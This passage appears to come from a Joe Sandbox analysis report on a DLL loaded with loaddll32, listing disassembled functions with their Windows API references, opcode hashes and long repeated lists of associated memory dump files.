Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd
String ID:
API String ID: 1400385479-0
Opcode ID: 43cea91efbea7abd4054008bcf718a1d0f73310909024db42749d371c6c93f10
Instruction ID: 1eeed97dad3817319d1a2db4c350e6a048875638fd404a7eac74cbb5f228a6b0
Opcode Fuzzy Hash: 43cea91efbea7abd4054008bcf718a1d0f73310909024db42749d371c6c93f10
Instruction Fuzzy Hash: E1E08CB59046009FEB189BE0C904EAD3774AF04215F30004CE002AB761CB34AC44DB21

Function 6CEDF345 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEDF34A

Part of subcall function 6CEB2D13: __EH_prolog.LIBCMT ref: 6CEB2D18
Part of subcall function 6CEB2D13: DeleteCriticalSection.KERNEL32(?,?,?,?,6CEB2CF9,00000000,?,?,6CEB9994), ref: 6CEB2D5B

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prolog$CriticalDeleteSection
String ID:
API String ID: 2647045519-0
Opcode ID: bf440ab12c8a436bb418e0076f6fc2a1f28024c422a5f6a77aa015ed7ebb9d0f
Instruction ID: 48e35908b9c353619a05365dee94f98ba10e7679ff865bb5bac016a5893164f6
Opcode Fuzzy Hash: bf440ab12c8a436bb418e0076f6fc2a1f28024c422a5f6a77aa015ed7ebb9d0f
Instruction Fuzzy Hash: ADE0C278A016898BCB28CFA0D1553BCB334EF80629F32035C942617F80CB399A018641

Function 6CF024B9 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 6CF0E1BD

Memory Dump Source

Source File: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 21140438c91f23f86292b14838cf696f13b5a2f0b3e823092ad57d29e842c181
Instruction ID: a4f8ae782e5ffe8cc89c0f416e00e397ac62eeb1638065b862c452f6a786ac2a
Opcode Fuzzy Hash: 21140438c91f23f86292b14838cf696f13b5a2f0b3e823092ad57d29e842c181
Instruction Fuzzy Hash: E7C0CAB268CA10DBC3042F0995C481AFAF9FA4AB00F42481DA0C983200C3710940AB92

Function 6CEBE8EB Relevance: 1.5, APIs: 1, Instructions: 8networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(6CEF14BC,6CEB83FF,?), ref: 6CEBE8F7

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: connect
String ID:
API String ID: 1959786783-0
Opcode ID: 7804bd7f03ba094e5d413028bdfa09c8e64e023b149d2c3c5aef1abbc6c13a9f
Instruction ID: 53a7b4fcad2efbfb00978f7f877d3751d5c3435d00783792e9a6c88562333da0
Opcode Fuzzy Hash: 7804bd7f03ba094e5d413028bdfa09c8e64e023b149d2c3c5aef1abbc6c13a9f
Instruction Fuzzy Hash: 39B0923204024EFBCF025FC1EC0489A3F3AFF09264F044014FA19040208B339830AB95

Function 6CF0A540 Relevance: 1.5, APIs: 1, Instructions: 8fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 6CF3FEF4

Memory Dump Source

Source File: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 919594a0ec907304819df75926c66910f54edd0394726166023e0c110724444d
Instruction ID: 8bebb5c23091cc17d75ad7fb9851476a94353b3b5b5c5b93fde88e3207a4ff1b
Opcode Fuzzy Hash: 919594a0ec907304819df75926c66910f54edd0394726166023e0c110724444d
Instruction Fuzzy Hash: C6B01267C4E504C5C3C04DD441043873B30B757342F175C08E00881C92DE698F824151

Function 6CEDF3B8 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

TlsFree.KERNELBASE ref: 6CEDF3C1

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: f6c7b2e8447add577a18f5ba8dda4fb237d120bf5f0319e5c8f136d514d7abf0
Instruction ID: 2c979c3ed7305063441b7ebb3453923632268f35b5f115a4c56677b026acf300
Opcode Fuzzy Hash: f6c7b2e8447add577a18f5ba8dda4fb237d120bf5f0319e5c8f136d514d7abf0
Instruction Fuzzy Hash: 8CB092B261128C578A422AD5E9064243A39A78A2E43141024E41A55A206E23D85C56AB

Function 6CEDF39D Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

TlsFree.KERNELBASE ref: 6CEDF3A6

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: b7ace258a9b3be31553f2a90dd459b92037e156c8b1d0803e13a4138bdf52a7b
Instruction ID: 4659df6949d4b21959f82edf95d8e6629149eeb8a24b3d41542581977534e94d
Opcode Fuzzy Hash: b7ace258a9b3be31553f2a90dd459b92037e156c8b1d0803e13a4138bdf52a7b
Instruction Fuzzy Hash: C8B092F820020C578B422AD5F9264243A3997C61A43209026E41A15A108E32D8585AAA

Function 6CED0BAB Relevance: 1.5, APIs: 1, Instructions: 6COMMONLIBRARYCODE

Download Yara Rule

APIs

_doexit.LIBCMT ref: 6CED0BB1

Part of subcall function 6CED0CF4: __lock.LIBCMT ref: 6CED0D02
Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(6CEEAE88,0000001C,6CED0C4D,00000000,00000001,00000000,?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D41
Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D52
Part of subcall function 6CED0CF4: EncodePointer.KERNEL32(00000000,?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D6B
